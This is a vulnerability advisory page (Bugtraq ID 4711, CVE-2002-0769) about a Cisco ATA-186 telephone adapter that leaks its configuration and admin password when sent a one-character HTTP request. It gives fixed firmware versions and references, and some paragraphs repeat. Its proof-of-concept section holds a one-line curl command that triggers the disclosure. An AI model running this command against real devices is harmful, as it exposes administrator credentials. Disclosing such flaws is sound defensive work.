Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability
BID:4711
Info
Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability
| Bugtraq ID: | 4711 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2002-0769 |
| Remote: | Yes |
| Local: | No |
| Published: | May 09 2002 12:00AM |
| Updated: | Jul 11 2009 12:46PM |
| Credit: | Discovered by Patrick Michael Kane <[email protected]>. |
| Vulnerable: |
Cisco ATA-186 |
| Not Vulnerable: | |
Discussion
Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability
The Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to interface between analog telephones and Voice over IP (VoIP). It includes support for web based configuration.
Reportedly, HTTP requests consisting of a single character will cause the device to disclose sensitive configuration information, including the password to the administrative web interface.
The Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to interface between analog telephones and Voice over IP (VoIP). It includes support for web based configuration.
Reportedly, HTTP requests consisting of a single character will cause the device to disclose sensitive configuration information, including the password to the administrative web interface.
Exploit / POC
Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability
Patrick Michael Kane <[email protected]> has provided the following curl command:
curl -d a http://ata186.example.com/dev
Patrick Michael Kane <[email protected]> has provided the following curl command:
curl -d a http://ata186.example.com/dev
Solution / Fix
Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability
Solution:
Cisco has identified all version previous to 020514a as vulnerable.
Fixes available:
Cisco ATA-186
Solution:
Cisco has identified all version previous to 020514a as vulnerable.
Fixes available:
Cisco ATA-186
-
Cisco ata186-v2-14-020514a-2.zip
H.323/SIP image
http://www.cisco.com/pcgi-bin/tablebuild.pl/ata186?psrtdcat20e2 -
Cisco ata186-v2-14-ms-020514a-2.zip
SCCP/MGCP image
http://www.cisco.com/pcgi-bin/tablebuild.pl/ata186?psrtdcat20e2
References
Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability
References:
References:
- ATA 186 Homepage (Cisco Systems)
- Cisco Security Advisory: ATA-186 Password Disclosure Vulnerability (Cisco)